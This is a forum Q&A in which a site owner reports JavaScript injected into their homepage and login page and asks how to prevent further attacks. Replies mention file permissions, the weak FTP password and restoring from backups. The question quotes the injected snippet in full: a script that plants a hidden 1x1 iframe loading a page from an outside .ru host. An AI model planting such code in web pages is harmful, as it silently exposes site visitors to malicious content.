# Javascript code added to server page automatically

Tags: ftp, web-hosting, spam, virus

Today morning I have noticed that some Javascript has been added to my hosted site . When I downloaded the homepage the code was like
 `<!--04b037--><script type="text/javascript"language="javascript">                                                                                            (function () {    var ipexz = document.createElement('iframe');    ipexz.src = 'http://nypmivhy.ru/count5.php';    ipexz.style.position = 'absolute';    ipexz.style.border = '0';    ipexz.style.height = '1px';    ipexz.style.width = '1px';    ipexz.style.left = '1px';    ipexz.style.top = '1px';    if (!document.getElementById('ipexz')) {        document.write('<div id=\'ipexz\'></div>');        document.getElementById('ipexz').appendChild(ipexz);    }})();</script><!--/04b037-->`
And in login page :

```
(function () { var usyux = document.createElement('iframe'); usyux.src = 'http://nypmivhy.ru/count5.php'; usyux.style.position = 'absolute'; usyux.style.border = '0'; usyux.style.height = '1px'; usyux.style.width = '1px'; usyux.style.left = '1px'; usyux.style.top = '1px'; if (!document.getElementById('usyux')) { document.write('
'); document.getElementById('usyux').appendChild(usyux); }})();" method="post"> Email
```

I guess its a virus/spam attack. Though I removed the javascript code now, I want to how can I prevent my site from such attacks. NB: My FTP password is very weak.

Comment: You don't "remove" injected code, you revert the site to a known-good backup and take immediate steps to prevent the break-in from being repeated. If you don't have backups *and* version control for everything on your site, you are not only wasting your own time, but ours and the general Internet's as well.

Answer (score 1, accepted):

Check the permissions of the file is correct otherwise it could be the code was injected.

Take a look at this:

http://ag.arizona.edu/ecat/web/permissions.html

There are 3 main permissions that you have to setup for the files:

```
read from the file
write to the file
execute the file
```

Here is a summary for permissions

[image]

Answer (score 2):

> NB: My FTP password is very weak.

You know what you are doing wrong and still you ask? Fix that first, also secure your computer, and if you are using scripts, review the logs for hacking attempts and make them secure.